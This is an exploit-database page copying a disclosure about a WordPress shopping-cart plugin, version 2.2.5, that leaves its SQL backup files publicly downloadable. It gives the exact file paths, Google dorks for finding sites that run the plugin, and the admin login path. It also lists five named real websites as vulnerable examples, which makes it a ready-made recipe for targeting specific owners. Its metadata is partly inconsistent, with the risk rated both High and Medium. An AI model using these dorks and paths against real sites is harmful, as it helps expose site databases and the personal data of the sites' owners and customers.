Advertisement






WordPress Simple-E-Commerce-Shopping-Cart Plugins 2.2.5 Database Backup Disclosure

CVE Category Price Severity
CVE-2020-21097 CWE-264 Not specified High
Author Risk Exploitation Type Date
Abdullah Alfiristio High Remote 2018-12-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120124

Below is a copy:

WordPress Simple-E-Commerce-Shopping-Cart Plugins 2.2.5 Database Backup Disclosure
#################################################################################################

# Exploit Title : WordPress Simple-E-Commerce-Shopping-Cart Plugins 2.2.5 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org/plugins/simple-e-commerce-shopping-cart/
# Owner of the Script : Niaz Showket
# Software Download Link : downloads.wordpress.org/plugin/simple-e-commerce-shopping-cart.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.2.5
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/simple-e-commerce-shopping-cart/''
intext:''Copyright Ike Amadi 2010-2016 - All Rights Reserved''
intext:''Designed by More Please Productions''
intext:''Theme: Nikkon by Kaira''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

+ WordPress Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal

#################################################################################################

# Admin Panel Login Path : 

/wp-login.php

# Exploit : 

/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql

/wp-content/plugins/simple-e-commerce-shopping-cart/sql/uninstall.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] printforcardealers.com/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql

[+] dev.vanderbecktree.com/dripwp.bkp_Apr2/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql

[+] morepleaseproductions.com/squeeze/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql

[+] ikeamadi.org/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql

[+] reckionline.de/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.